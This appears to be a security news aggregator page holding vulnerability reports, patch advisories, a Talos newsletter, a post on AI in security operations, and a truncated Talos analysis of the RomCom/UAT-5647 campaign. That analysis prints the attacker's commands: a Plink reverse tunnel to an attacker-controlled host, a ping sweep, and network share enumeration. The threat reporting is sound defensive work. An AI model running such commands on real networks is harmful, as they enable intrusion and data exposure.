IT Vulnerability Weekly Report: Cyble Urges Fixes for Fortinet, Palo Alto & More

/in

Overview

Cyble Research and Intelligence Labs (CRIL) investigated 27 vulnerabilities during the week of October 9-15 and identified 11 as high-priority fixes for security teams.

Cyble researchers also observed 14 vulnerability exploits discussed on dark web and cybercrime forums, raising the likelihood that those vulnerabilities will be exploited more frequently.

Of the vulnerabilities highlighted by Cyble threat researchers, two are being actively exploited by state-sponsored threat actors, and five could be chained together to hijack Palo Alto Networks firewalls.

Among the vulnerabilities investigated by Cyble researchers this week, Cyble’s Odin vulnerability exposure search tool detected 427,000 vulnerable Fortinet devices exposed to the internet after CVE-2024-23113, a 9.8-severity Format String Vulnerability, was added to CISA’s Known Exploited Vulnerabilities catalog on Oct. 9.

Other vulnerable web-facing assets detected by Cyble Odin include 87,000 exposed GitLab and SAML instances, 35,000 vulnerable Zimbra servers, 7,800 vulnerable Ivanti Cloud Services Appliances, and 2,400 exposed Veeam Backup instances (chart below). Cyble issued separate advisories regarding several of those vulnerabilities (see links).

Product & Vulnerability
Internet Exposures

Fortinet (CVE-2024-23113)
427,134

Gitlab EE (CVE-2024-9164)
87,402

SAML Toolkits (CVE-2024-45409)
87,042

Zimbra Web Client (CVE-2024-45519)
35,064

Ivanti CSA (CVE2024-9380, CVE-2024-9379)
7,831

Veeam Backup & Replication (CVE-2024- 40711)
2,408

Below are the 11 high-priority vulnerabilities and 14 dark web exploits in detail.

The Top IT Vulnerabilities

These 11 vulnerabilities should be prioritized by security teams, according to Cyble researchers.

CVE-2024-30088: A high-severity privilege escalation vulnerability in Windows that enables attackers to escalate their privileges to the SYSTEM level, giving them significant control over compromised devices. Researchers disclosed that the Iranian state-sponsored hacking group APT34, aka OilRig, is exploiting the CVE-2024-30088 flaw to elevate their privileges on compromised devices in their new campaigns targeting government and critical infrastructure entities in the United Arab Emirates and the Gulf region.

CVE-2024-9486: This critical vulnerability affects Kubernetes Image Builder, a specialized tool designed for creating virtual machine images that are optimized for Kubernetes environments. The flaw impacts versions <= v0.1.37, where default credentials are enabled during the image build process. The credentials can be used to gain root access. Kubernetes clusters are only affected if their nodes use VM images created via the Image Builder project with its Proxmox provider.

CVE-2024-38178: A high-severity type confusion vulnerability that impacts Internet Explorer. Recently, government agencies disclosed that ScarCruft, a state-sponsored cyber-espionage threat actor known for targeting systems in South Korea and Europe, launched a new campaign dubbed “Code on Toast.” This campaign leveraged toast pop-up ads to perform zero-click malware infections by exploiting the CVE-2024-38178 vulnerability.

CVE-2024-40711: This critical deserialization of untrusted data vulnerability impacts Veeam Backup & Replication (VBR) and can lead to unauthenticated remote code execution (RCE). Recently, researchers discovered that Akira and Fog ransomware groups are now exploiting the vulnerability to gain RCE on vulnerable servers.

CVE-2024-9164: This critical vulnerability impacts GitLab Enterprise Edition (EE). The flaw allows unauthorized users to trigger Continuous Integration/Continuous Delivery (CI/CD) pipelines on any branch of a repository. An attacker capable of bypassing branch protections could potentially perform code execution or gain access to sensitive information.

CVE-2024-9463, CVE-2024-9464, CVE-2024-9465, CVE-2024-9466, CVE-2024-9467: These vulnerabilities – the first of which carries a 9.9 severity rating – impact Palo Alto Networks Expedition, a migration tool designed to facilitate the transition of network configurations from various vendors to Palo Alto Networks PAN-OS. This tool is particularly useful for organizations looking to switch from competitors, as it helps streamline the migration process and reduce the time and effort required for configuration changes. The flaws can be chained to let attackers hijack PAN-OS firewalls and are being discussed by threat actors (see dark web section below). CVE-2024-9463 and CVE-2024-9464 are OS command injection vulnerabilities allowing an unauthenticated attacker to run arbitrary OS commands as root in Expedition. Upon successful exploitation, the vulnerabilities may result in the disclosure of usernames, cleartext passwords, device configurations, and device API keys of PAN-OS firewalls.

CVE-2024-9465 is an SQL injection vulnerability that allows an unauthenticated attacker to reveal Expedition database contents, such as password hashes, usernames, device configurations, and device API keys. CVE-2024-9466 is a vulnerability in cleartext storage of sensitive information that allows an authenticated attacker to reveal firewall usernames, passwords, and API keys generated using those credentials. CVE-2024-9467 is a reflected XSS vulnerability allowing attackers to execute malicious JavaScript code in the context of an authenticated Expedition user’s browser.

Dark Web and Cybercrime Forum Exploits

Cyble researchers also observed numerous vulnerability exploits discussed in cybercrime forums and on Telegram channels. These vulnerabilities could become increasingly exploited because of these dark web activities, meriting higher priority attention from security teams.

CVE-2024-30052: A remote code execution (RCE) vulnerability affecting Microsoft Visual Studio, particularly versions 2022 prior to 17.8.11 and certain configurations of Visual Studio 2019.

CVE-2024-20353: A critical vulnerability identified in Cisco’s Adaptive Security Appliance (ASA) and Firepower Threat Defense (FTD) software, which allows for a Denial-of-Service (DoS) attack. The vulnerability enables an attacker to send crafted HTTP requests that can cause the device to reload unexpectedly, leading to service disruptions.

CVE-2024-7479: A critical security vulnerability affecting TeamViewer’s Remote Client and Remote Host products for Windows. The vulnerability arises from improper verification of cryptographic signatures during the installation of VPN drivers, allowing attackers with local, unprivileged access to escalate their privileges and execute arbitrary code.

CVE-2024-7481: A critical security vulnerability affecting TeamViewer’s Remote Client and Remote Host products for Windows. The vulnerability arises from improper verification of cryptographic signatures during the installation of printer drivers, allowing attackers with local, unprivileged access to escalate their privileges and execute arbitrary code.

CVE-2024-42640: A critical vulnerability affecting the angular-base64-upload library, specifically in versions prior to v0.1.21. This vulnerability allows remote code execution (RCE) through the demo/server.php endpoint, enabling attackers to upload arbitrary files to the server.

CVE-2024-9464: A critical OS command injection vulnerability found in Palo Alto Networks’ Expedition tool, which allows an attacker to execute arbitrary OS commands as root, potentially leading to the disclosure of sensitive information.

CVE-2024-45409: A critical vulnerability affecting the Ruby-SAML and OmniAuth-SAML libraries. This flaw allows unauthenticated attackers to bypass Security Assertion Markup Language (SAML) authentication mechanisms by exploiting weaknesses in the signature verification process of SAML responses.

CVE-2024-45200: A recently identified vulnerability affecting Mario Kart 8 Deluxe, specifically versions prior to 3.0.3. This security flaw, dubbed “KartLANPwn,” is classified as a stack-based buffer overflow that occurs during the local multiplayer (LAN/LDN) gameplay mode, which allows remote attackers on the same local network to execute arbitrary code or cause a denial-of-service (DoS) condition on the victim’s console without requiring user interaction or elevated privileges.

CVE-2024-6769: This vulnerability affects multiple versions of Microsoft Windows, including Windows 10, Windows 11, and various Windows Server editions. It exploits a combination of DLL Hijacking and Activation Cache Poisoning, allowing an attacker to elevate privileges from a medium to a high-integrity process without triggering a User Account Control (UAC) prompt.

CVE-2024-38816: A high-severity path traversal vulnerability was discovered in the Spring Framework and VMWare Tanzu Spring platform, affecting multiple versions. This vulnerability allows attackers to exploit improper handling of static resources, potentially gaining unauthorized access to sensitive files on the server.

CVE-2024-5830: A critical security vulnerability was discovered in Google Chrome’s V8 JavaScript engine, affecting versions prior to 126.0.6478.54. This vulnerability is a type of confusion bug that an attacker can exploit to execute arbitrary code within the Chrome renderer sandbox simply by enticing a victim to visit a malicious website.

CVE-2024-20404: A medium severity vulnerability affecting the webbased management interface of Cisco Finesse. The issue comes from insufficient validation of user-supplied input for specific HTTP requests, which allows remote attackers to conduct Server-Side Request Forgery (SSRF) attacks on an affected system.

CVE-2024-0044: A high-severity vulnerability affecting Android versions 12, 12L, 13, and 14 and is present in the createSessionInternal function of the PackageInstallerService.java, allowing attackers to execute a “run-as any app” attack. This exploit can lead to local escalation of privileges without requiring user interaction, primarily due to improper input validation.

CVE-2024-45519: A critical Remote Code Execution (RCE) vulnerability was discovered in the postjournal service of the Zimbra Collaboration Suite, a widely used email and collaboration platform.

Cyble Recommendations

To protect against these vulnerabilities and exploits, organizations should implement the following best practices:


To mitigate vulnerabilities and protect against exploits, regularly update all software and hardware systems with the latest patches from official vendors.

Develop a comprehensive patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification. Automate the process where possible to ensure consistency and efficiency.

Divide your network into distinct segments to isolate critical assets from less secure areas. Use firewalls, VLANs, and access controls to limit access and reduce the attack surface exposed to potential threats.

Create and maintain an incident response plan that outlines procedures for detecting, responding to, and recovering from security incidents. Regularly test and update the plan to ensure its effectiveness and alignment with current threats.

Implement comprehensive monitoring and logging solutions to detect and analyze suspicious activities. Use SIEM (Security Information and Event Management) systems to aggregate and correlate logs for real-time threat detection and response.

Subscribe to security advisories and alerts from official vendors, CERTs, and other authoritative sources. Regularly review and assess the impact of these alerts on your systems and take appropriate actions.

Conduct regular vulnerability assessment and penetration testing (VAPT) exercises to identify and remediate vulnerabilities in your systems. Complement these exercises with periodic security audits to ensure compliance with security policies and standards.

Conclusion

These vulnerabilities highlight the urgent need for security teams to prioritize patching critical vulnerabilities in major products. With increasing discussions of these exploits on dark web forums, organizations must stay vigilant and proactive. Implementing strong security practices is essential to protect sensitive data and maintain system integrity.

The post IT Vulnerability Weekly Report: Cyble Urges Fixes for Fortinet, Palo Alto & More appeared first on Cyble.

Blog – Cyble – ​Read More

Which cybersecurity processes can be automated with AI? | Kaspersky official blog

/in

Although automation and machine learning (ML) have been used in information security for almost two decades, experimentation in this field continues non-stop. Security professionals need to combat increasingly sophisticated cyberthreats and a growing number of attacks without significant increases in budget or personnel. On the positive side, AI greatly reduces the workload on security analysts, while also accelerating many phases of incident handling — from detection to response. However, a number of seemingly obvious areas of ML application are underperforming.

AI-based detection of cyberthreats

To massively oversimplify, there are two basic — and long-tested — ways to apply ML:

Attack detection. By training AI on examples of phishing emails, malicious files, and dangerous app behavior, we can achieve an acceptable level of detection of similar The main pitfall is that this area is highly dynamic — with attackers constantly devising new methods of disguise. Therefore, the model needs frequent retraining to maintain its effectiveness. This requires a labeled dataset — that is, a large collection of recent, verified examples of malicious behavior. An algorithm trained in this way won’t be effective against fundamentally new, never-before-seen attacks. What’s more, there are certain difficulties in detecting attacks that rely entirely on legitimate IT tools (LotL). Despite these limitations, most infosec vendors use this method, which is quite effective for email analysis, phishing detection, and identifying certain classes of malware. That said, it promises neither full automation nor 100% reliability.
Anomaly detection. By training AI on “normal” server and workstation activity, we can identify deviations from this norm — such as when an accountant suddenly starts performing administrative actions with the mail server. The pitfalls here are that this method requires (a) collecting and storing vast amounts of telemetry, and (b) regular retraining of the AI to keep up with changes in the IT infrastructure. Even then, there’ll be many false positives (FPs) and no guarantee of attack detection. Anomaly detection must be tailored to the specific organization, so using such a tool requires people highly skilled in cybersecurity, data analysis, and ML. And these priceless employees have to provide 24/7 system support.

The philosophical conclusion we can draw thus far is that AI excels at routine tasks where the subject area and object characteristics change slowly and infrequently: writing coherent texts, recognizing dog breeds, and so on. Where there is a human mind actively resisting the training data, statically configured AI in time gradually becomes less and less effective. Analysts fine-tune the AI instead of creating cyberthreat detection rules — the work domain changes, but, contrary to a common misconception, no human-labor saving is achieved. Furthermore, the desire to improve AI threat detection and boost the number of true positives (TP) inevitably leads to a rise in the number of FPs, which directly increases the human workload. Conversely, trying to cut FPs to near zero results in fewer TPs as well — thereby increasing the risk of missing a cyberattack.

As a result, AI has a place in the detection toolkit, but not as a silver bullet able to solve all detection problems in cybersecurity, or work completely autonomously.

AI as a SOC analyst’s partner

AI can’t be entirely entrusted with searching for cyberthreats, but it can reduce the human workload by independently analyzing simple SIEM alerts and assisting analysts in other cases:

Filtering false positives. Having been trained on SIEM alerts and analysts’ verdicts, AI can filter FPs quite reliably: our Kaspersky MDR solution achieves a SOC workload reduction of around 25%. See our forthcoming post for details of this “auto-analytics” implementation.
Alert prioritization. The same ML engine doesn’t just filter out FPs; it also assesses the likelihood that a detected event indicates serious malicious activity. Such critical alerts are then passed to experts for prioritized analysis. Alternatively, “threat probability” can be represented as a visual indicator — helping the analyst prioritize the most important alerts.
Anomaly detection. AI can quickly alert about anomalies in the protected infrastructure by tracking phenomena like a surge in the number of alerts, a sharp increase or decrease in the flow of telemetry from certain sensors, or changes in its structure.
Suspicious behavior detection. Although searching for arbitrary anomalies in a network entails significant difficulties, certain scenarios lend themselves well to automation, and in these cases, ML outperforms static rules. Examples include detecting unauthorized account usage from unusual subnets; detecting abnormal access to file servers and scanning them; and searching for pass-the-ticket attacks.

Large language models in cybersecurity

As the top trending topic in AI, large language models (LLMs) have also been extensively tested by infosec firms. Leaving aside cybercriminal pursuits such as generating phishing emails and malware using GPT, we note these interesting (and plentiful) experiments in leveraging LLMs for routine tasks:

Generating detailed cyberthreat descriptions
Drafting incident investigation reports
Fuzzy search in data archives and logs via chats
Generating tests, test cases, and code for fuzzing
Initial analysis of decompiled source code in reverse engineering
De-obfuscation and explanation of long command lines (our MDR service already employs this technology)
Generating hints and tips for writing detection rules and scripts

Most of the linked-to papers and articles describe niche implementations or scientific experiments, so they don’t provide a measurable assessment of performance. Moreover, available research on the performance of skilled employees aided by LLMs shows mixed results. Therefore, such solutions should be implemented slowly and in stages, with a preliminary assessment of the savings potential, and a detailed evaluation of the time investment and the quality of result.

Kaspersky official blog – ​Read More

What I’ve learned in my first 7-ish years in cybersecurity

/in

When I first interviewed with Joel Esler for my position at Cisco Talos, I remember when the time came for me to ask questions, one thing stood out. I asked what resources were available to me to learn about cybersecurity, because I was totally new to the space.  

His answer: The people. When I asked that question, Joel told me that the entire office was a library for me. He told me to just ask as many questions as I could. 

Coming from journalism, where I was reporting on a range of topics from local government, finance and banking, art and culture, and sports, cybersecurity was totally new to me. Now almost seven years later, I’ve been able to host a podcast that went nearly 200 episodes, relaunch a cybersecurity newsletter, researched malicious Facebook groups trading stolen personal information, and I’ve even learned how to write a ClamAV signature. 

Unfortunately, this week is my last at Talos, but far from my last in cybersecurity. I’m off to a new adventure, but I wanted to take the space here to talk about what I’ve learned in my career at Talos.  

I think that this is a good lesson for anyone reading this: If you want to work in cybersecurity, you can, no matter what your background or education is. I’ve met colleagues across Talos who previously studied counterterrorism operations, German and Russian history, and political science. And I walked into my first day on the job knowing next to nothing about cybersecurity. I knew I could write, and I knew I could help Talos tell their story (and clean up the occasional passive voice in their blog posts). But I had never heard of a remote access trojan before.  

I hope these lessons resonate with you, your team, or the next person you think about hiring into the cybersecurity industry.  

You can’t do any of this without people. This has become extraordinarily relevant this year with the advent of AI. I personally have beef with the term “AI” anyway because we’ve been using machine learning in cybersecurity for years now, which is essentially what we’re using the “AI” buzzword to mean now. But at the end of the day, people are what makes cybersecurity detection work in the first place. If you don’t have a team that’s ready to put in the work necessary to write, test and improve the intelligence that goes into security products (AI or not), you’re doomed. Any of these tools are only as good as the people who put the information into them. I’ve been beyond impressed with the experience, work ethic, and knowledge that everyone in Talos has. They are what makes the engine run, and none of this would work without them. You can carve out your own niche in cybersecurity. That said, you don’t have to know how to code to work in cybersecurity if you don’t want to. Anyone can carve out their own niche in the space with their own skillset. I still barely know how to write Python, but I’ve been able to use the skills that I do have (research, writing, storytelling, audio editing, etc.) to carve out my space in cybersecurity. I can speak intelligently about security problems and solutions with my colleagues without needing to know how to reverse-engineer a piece of malware. And even on the technical side of things, everyone can carve out their own specialty. Talos has experts on email spam, and even specific types of email spam, that their colleagues may not know anything about. Others specialize in certain geographic areas because they can speak the language there and can peel back an additional layer that non-native speakers can’t.  Be a sponge. Going back to the opening of this week’s newsletter, I needed to ask hundreds of questions in my first few months at Talos. It took me a good amount of time to get over my fear of looking stupid, and that held me back early on from having more intelligent conversations with my teammates because I would keep questions inside or just assume that Google had the right answers. No matter how many years you’ve been in the security space, there is always something new to learn. Never assume you know everything there is to know on a given topic. If you are a sponge for information, you never know what new skills you can pick up along the way. When I graduated from college with a journalism degree, I never would have believed you if you told me at the time that I’d be needing to understand how atomic clocks keep power grids running. But here we are. 

The Threat Source newsletter will be off for a few weeks while it undergoes a revamp, and it’ll be back with a new look.  

I want to thank everyone who has enabled me to grow and shape this newsletter over the years, growing it to thousands of subscribers. And, of course, thanks to the readers who have engaged, read and shared over the years.  

The one big thing 

Cisco Talos has observed a new wave of attacks active since at least late 2023, from a Russian-speaking group we track as “UAT-5647” against Ukrainian government entities and unknown Polish entities. The latest series of attacks deploys an updated version of the RomCom malware we track as “SingleCamper.” This version is loaded directly from the registry into memory and uses a loopback address to communicate with its loader. 

Why do I care? 

UAT-5647 has long been considered a multi-motivational threat actor performing ransomware and espionage-oriented attacks. However, in recent months, it has accelerated its attacks with a clear focus on establishing long–term access for exfiltrating data of strategic interest to it. UAT-5647 has also evolved its tooling to include four distinct malware families: two downloaders we track as RustClaw and MeltingClaw, a RUST-based backdoor we call DustyHammock, and a C++-based backdoor we call ShadyHammock. 

So now what? 

Cisco Talos has released several Snort rules and ClamAV signatures to detect and defend against the several malware families that UAT-5647 uses.  

Top security headlines of the week 

Government and security officials are still unraveling what to make of recent revelations around multiple Chinese-state-sponsored actors infiltrating U.S. networks. Most recently, Salt Typhoon was unveiled as a new actor that may have accessed foreign intelligence surveillance systems and electronic communications that some ISPs collect. like Verizon and AT&T collect based on U.S. court orders. The actor reportedly accessed highly sensitive intelligence and law enforcement data. This followed on reports earlier this year of other Chinese state-sponsored actors Volt Typhoon and Flax Typhoon, which targeted U.S. government networks and systems on military bases. One source told the Wall Street Journal that the latest discovery of Salt Typhoon could be “potentially catastrophic.” The actor allegedly gained access to Verizon, AT&T and Lumen Technologies by exploiting systems those companies use to comply with the U.S. CALEA act, which essentially legalizes wiretapping when required by law enforcement. (Axios, Tech Crunch

Chip maker Qualcomm says adversaries exploited a zero-day vulnerability in dozens of its chipsets used in popular Android devices. While few details are currently available regarding the vulnerability, CVE-2024-43047, researchers at Google and Amnesty International say they are working with Qualcomm to remediate and responsibly disclose more information. Qualcomm listed 64 different chipsets as being affected by the vulnerability, including the company’s Snapdragon 8 mobile platform, which is used many Android phones, including some made by Motorola, Samsung and ZTE. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) also added the issue to its Known Exploited Vulnerabilities catalog, indicating they can confirm it’s been actively exploited in the wild. Qualcomm said it issued a fix in September, and it is now on the device manufacturers to roll out patches to their customers for affected devices. (Android Police, Tech Crunch

As many as 14,000 medical devices across the globe are online and vulnerable to a bevy of security vulnerabilities and exploits, according to a new study. Security research firm Censys recently found the devices exposed, which “greatly raise the risk of unauthorized access and exploitation.” Forty-nine percent of the exposed devices are located in the U.S. America’s decentralized health care system is largely believed to affect the amount of vulnerable devices, because there is less coordinaton to isolate the devices or patch them when vulnerabilities are disclosed, unlike countries like the U.K., where the health care system is solely organized and managed by the government. The Censys study found that many of the networks belonging to smaller health care organizations used residential ISPs, making them inherently less secure. Others set up devices and connected them to the internet without changing the preconfigured credentials or leaving their connections unencrypted. Others had simply been misconfigured. Open DICOM and DICOM-enabled web interfaces that are intended to share and view medical images were responsible for 36 percent of the exposures, with 5,100 IPs hosting these systems. (CyberScoop, Censys

Can’t get enough Talos? 

Attackers Delight: Why Does Healthcare See So Many Attacks? Ghidra data type archive for Windows driver functions Protecting major events: An incident response blueprint 

Upcoming events where you can find Talos

MITRE ATT&CKcon 5.0 (Oct. 22 – 23) 

McLean, Virginia and Virtual

Nicole Hoffman and James Nutland will provide a brief history of Akira ransomware and an overview of the Linux ransomware landscape. Then, morph into action as they take a technical deep dive into the latest Linux variant using the ATT&CK framework to uncover its techniques, tactics and procedures.

it-sa Expo & Congress (Oct. 22 – 24) 

Nuremberg, Germany

White Hat Desert Con (Nov. 14) 

Doha, Qatar

misecCON (Nov. 22) 

Lansing, Michigan

Terryn Valikodath from Cisco Talos Incident Response will explore the core of DFIR, where digital forensics becomes detective work and incident response turns into firefighting.

Most prevalent malware files from Talos telemetry over the past week 

There is no new data to report this week. This section will be overhauled in the next edition of the Threat Source newsletter.  

Cisco Talos Blog – ​Read More

SolarWinds Releases Patches for High-Severity Vulnerabilities

/in

Overview

SolarWinds has issued an important security update advisory outlining the latest vulnerability patches released for its products. This advisory provides insights into recently disclosed vulnerabilities affecting the SolarWinds range and emphasizes the need for organizations to take immediate action to protect their IT infrastructure.

The advisory details various vulnerabilities and their associated risk scores, categorized by severity levels. High vulnerabilities, classified with a CVSS base score of 7.0 to 10.0, include three identified issues, specifically CVE-2024-45714, CVE-2024-45711, CVE-2024-45710, and CVE-2024-45715. These vulnerabilities carry a high-risk score and are marked with a Green TLP rating.

In addition, there is one medium vulnerability, which falls within a CVSS score range of 4.0 to 6.9 and is also rated Green. Furthermore, no vulnerabilities have been classified as low, with a score range of 0.0 to 3.9, reflecting a low-risk status.

Several products and versions have been identified as vulnerable, with patches readily available. Specifically, CVE-2024-45714 affects Serv-U version 15.4.2.3 and earlier, while CVE-2024-45711 impacts Serv-U version 15.4.2 and earlier versions. Additionally, CVE-2024-45710 and CVE-2024-45715 affect SolarWinds Platform version 2024.2.1 and all previous versions.

Detailed Vulnerability Analysis

The Cross-Site Scripting vulnerability (CVE-2024-45714) is classified with a CVSS score of 4.8, indicating a medium severity level. This vulnerability affects Serv-U version 15.4.2.3 and earlier. It allows an authenticated attacker to exploit a flaw in the system, enabling them to modify a variable using a malicious payload.

Another vulnerability is Directory Traversal (CVE-2024-45711), which carries a CVSS score of 7.5, categorizing it as high severity. This issue affects Serv-U version 15.4.2 and earlier versions. The vulnerability may allow for remote code execution, contingent upon the privileges assigned to the authenticated user. To successfully exploit this vulnerability, the attacker must have already gained authentication.

The Uncontrolled Search Path Element vulnerability, identified as CVE-2024-45710, has a CVSS score of 7.8, also indicating high severity. This vulnerability affects the SolarWinds Platform version 2024.2.1 and earlier. It can be exploited to escalate privileges locally by a low-privilege user who has access to the affected machine.

Lastly, Cross-Site Scripting (CVE-2024-45715) has a CVSS score of 7.1, placing it in the high severity category. This vulnerability impacts SolarWinds Platform version 2024.2.1 and previous versions. Affected versions are susceptible to XSS when users perform edit functions on existing elements, potentially compromising system security.

Recommendations

To mitigate the risks associated with these vulnerabilities, organizations should implement the following strategies:


Organizations must promptly apply the latest patches released by SolarWinds to all affected products.

Develop a comprehensive patch management strategy that includes inventory management, assessment, testing, deployment, and verification of patches.

Organizations should segment their networks to safeguard critical assets. This can be achieved through firewalls, VLANs, and access controls, effectively reducing the attack surface.

An incident response plan should be created and regularly tested to ensure it remains effective against evolving threats. This plan should outline procedures for detection, response, and recovery from security incidents.

Organizations are encouraged to implement comprehensive monitoring solutions to detect suspicious activities.

Proactively identify and assess the criticality of any End-of-Life (EOL) products, ensuring timely upgrades or replacements to maintain security integrity.

Conclusion

The SolarWinds platform and its Serv-U product are integral to many organizations for IT management and network monitoring. Given the history of attacks exploiting vulnerabilities in SolarWinds products, organizations need to address any newly disclosed high-severity vulnerabilities promptly. Failure to patch these vulnerabilities could expose organizations to operational and security risks.

The post SolarWinds Releases Patches for High-Severity Vulnerabilities appeared first on Cyble.

Blog – Cyble – ​Read More

GitHub Releases Security Advisory on Critical Vulnerability in Self-Hosted Environments

/in

Overview

GitHub has issued a security advisory regarding critical vulnerabilities that require immediate attention from users of the GitHub Enterprise Server (GHES). This advisory highlights a specific vulnerability that could severely compromise organizations’ security relying on this self-hosted version of GitHub, which is tailored for those needing to manage their infrastructure, security, and compliance.

GitHub Enterprise Server is a platform that enables organizations to host their repositories while maintaining control over security protocols. However, vulnerabilities identified under the Common Vulnerabilities and Exposures (CVE) system and classified by the Common Vulnerability Scoring System (CVSS) indicate potential risks that must be addressed promptly.

CVE-2024-9487 is a critical vulnerability that impacts specific versions of GitHub Enterprise Server (GHES). It falls under the category of critical security updates and has a risk score of critical. 

The affected versions of GitHub Enterprise Server include up to 3.11.15, 3.12.9, 3.13.4, and 3.14.1. GitHub, the vendor responsible for the software, has confirmed that a patch is available to address this critical vulnerability. For organizations, accessing the patch link is essential to ensure the security of their systems.

Vulnerability Details

The identified vulnerability, CVE-2024-9487, has a CVSS score of 9.5, categorizing it as critical. This vulnerability stems from an improper verification of cryptographic signatures. It enables attackers to bypass SAML Single Sign-On (SSO) authentication, allowing unauthorized user provisioning and access to the GitHub instance.

To exploit this vulnerability, attackers need the encrypted assertions feature enabled, along with direct network access and a signed SAML response or metadata document. This combination presents a significant risk, emphasizing the urgency for organizations to implement the available patch.

The security of software development environments hinges on the timely patching critical vulnerabilities. The GitHub Enterprise Server is responsible for protecting sensitive source code, project data, and developer credentials. Unaddressed vulnerabilities can lead to severe repercussions, including data breaches, unauthorized access, and potential sabotage of the development pipeline.

Moreover, the implications extend beyond technical vulnerabilities. Failure to patch can expose organizations to regulatory penalties, particularly in environments where compliance with data protection and cybersecurity regulations is essential.

Recommendations for Organizations

To effectively mitigate risks associated with the vulnerabilities in GitHub Enterprise Server, organizations should consider the following recommendations:


Regularly update all software and hardware systems with the latest patches from official vendors. This is crucial for mitigating vulnerabilities and preventing exploits.

Organizations should establish a detailed patch management strategy that includes inventory management, patch assessment, testing, deployment, and verification.

To protect critical assets, organizations should segment their networks. This can be accomplished using firewalls, VLANs, and access controls to limit exposure and reduce the attack surface.

Creating and maintaining an incident response plan is essential. This plan should outline procedures for detecting, responding to, and recovering from security incidents.

Organizations should implement comprehensive monitoring and logging systems to detect and analyze suspicious activities. Utilizing Security Information and Event Management (SIEM) solutions can help aggregate and correlate logs for real-time threat detection.

Organizations should proactively identify and assess the criticality of End-of-Life (EOL) products within their infrastructure.

Conclusion

Addressing the recently disclosed critical vulnerabilities in GitHub Enterprise Server is important for organizations aiming to protect their development environments. By following the recommendations outlined above, businesses can upgrade their security posture and protect against potential threats, ensuring the integrity of their software development processes. Timely action is essential to mitigate risks and uphold compliance with necessary regulations.

The post GitHub Releases Security Advisory on Critical Vulnerability in Self-Hosted Environments appeared first on Cyble.

Blog – Cyble – ​Read More

UAT-5647 targets Ukrainian and Polish entities with RomCom malware variants

/in

By Dmytro Korzhevin, Asheer Malhotra, Vanja Svajcer and Vitor Ventura. 

Cisco Talos has observed a new wave of attacks active since at least late 2023, from a Russian speaking group we track as “UAT-5647”, against Ukrainian government entities and unknown Polish entities. UAT-5647 is also known as  RomCom and is widely attributed to Russian speaking threat actors in open-source reporting.  The latest series of attacks deploys an updated version of the RomCom malware we track as “SingleCamper”. This version is loaded directly from registry into memory and uses loopback address to communicate with its loader.UAT-5647 has also evolved their tooling to include four distinct malware families: two downloaders we track as RustClaw and MeltingClaw; a RUST-based backdoor we call DustyHammock; and a C++ based backdoor we call ShadyHammock.During its lateral movement, the threat actor attempted to compromise edge devices by tunneling internal interfaces to external, remote hosts controlled by UAT-5647. If successful, it would have higher chances of evading detection during the incident response process. 

UAT-5647 has long been considered a multi-motivational threat actor performing both ransomware and espionage-oriented attacks. However, UAT-5647 has accelerated their attacks in recent months with a clear focus on establishing long–term access for exfiltrating data of strategic interest to them. Our assessment, in line with recent reporting from CERT-UA and Palo Alto Networks, indicates that the threat actor is aggressively expanding their tooling and infrastructure to support a wide variety of malware components authored in diverse languages and platforms such as GoLang, C++, RUST and LUA.  

Talos further assesses that this specific series of attacks, targeting high profile Ukrainian entities, is likely meant to serve UAT-5647’s two-pronged strategy in a staged manner – establish long-term access and exfiltrate data for as long as possible to support espionage motives, and then potentially pivot to ransomware deployment to disrupt and likely financially gain from the compromise. It is also likely that Polish entities were also targeted, based on the keyboard language checks performed by the malware.

UAT-5647 infection chain 

The infection chain consists of a spear-phishing message delivering a downloader consisting of either of two variants: “RustyClaw” – a RUST-based downloader, and a C++ based variant we track as “MeltingClaw”. The downloaders make way for and establish persistence for two distinct backdoors we call “DustyHammock” and “ShadyHammock,” respectively.  

DustyHammock is a more straightforward backdoor meant to be the core malicious component of the infection communicating with its command and control (C2) and performing malicious actions. ShadyHammock is, however, a two-pronged backdoor responsible for loading and activating the SingleCamper implant (RomCom malware variant) on an infected system and optionally listening for incoming commands from another malicious component. 

The overall infection chain can be visualized as: 

 

UAT-5647’s post-compromise activity 

The post-compromise activity by UAT-5647 is standard to what we would expect for a threat actor whose primary motivation is espionage. There is however one set of actions that stand out. It is our assessment that at some point the threat actor started targeting the edge devices, from inside the compromised network. This and other activities are detailed in the following sub-sections. 

Tunneling into the enterprise 

Once preliminary network reconnaissance was completed, UAT-5647 downloaded PuTTY’s Plink tool to establish remote tunnels between accessible endpoints and attacker-controlled servers [T1572]. While this is a common practice, one of the configurations was mapping the internal admin port of an edge device.

cmd /C %public%picturesiestatus[.]exe -pw _passwd_ -batch -hostkey SHA256:_KEY_ -N -R 8080:_IP_IN_INFECTED_NETWORK_:80 root@_ATTACKERS_REMOTE_IP_ -P 7722

Any traffic sent to Port 8088 on the attacker-controlled remote server will be forwarded to Port 80 on (<IP_IN_INFECTED_NETWORK>). This technique effectively exposes the application on Port 80 to the attackers allowing them to: 

Brute force or password spray to gain access to the service. Monitor and exfiltrate data and configuration from the application once access has been achieved. 

Based on URLs exposed to the threat actors now on Port 8088 such as “hxxp[://]193[.]42[.]36[.]131:8088/help/LanArpBindingListHelpRpm[.]htm”, “userRpm/VirtualServerRpm.htm”, and Censys data, it is likely that the <IP_IN_INFECTED_NETWORK> IP address is a “TP-LINK Wireless G Router WR340G”.

UAT-5647’s lateral movement and system discovery 

The threat actors were particularly interested in network reconnaissance, evident from the repeated ping sweeps they carried out to find adjoining systems [T1016]: 

powershell command 1..254 | % {ping n 1 a w 100 192.168.0.$_} | SelectString [

Once UAT-5647 deemed a specific system on the network as interesting, they can take one of two actions: 

Based on the results of the ping sweep (ICMP sweep), UAT-5647 created and executed a customized batch (BAT) file named “nv[.]bat”. The BAT file is used to run “net view” to obtain a list of shares exposed on specific IPs [T1135]:  

net view /all [][]192[.]168[.]XXX[.]XXX
net view /all [][]192[.]168[.]XXX[.]XXX
net view /all [][]192[.]168[.]XXX[.]XXX
net view /all [][]192[.]168[.]XXX[.]XXX

UAT-5647 further pinged additional endpoints in the network, this time however using their hostnames and specific IPs [T1016]: 

ping -n 1 <IP>
ping -n 1 <hostname>

A successful response from the system leads to shared folder reconnaissance [T1135]: 

dir [][]192[.]168[.]0[.]XXXc$
dir [][]<hostname>c$

They began to run highly specific port scans on it, likely to find means of obtaining unauthorized access to it: 

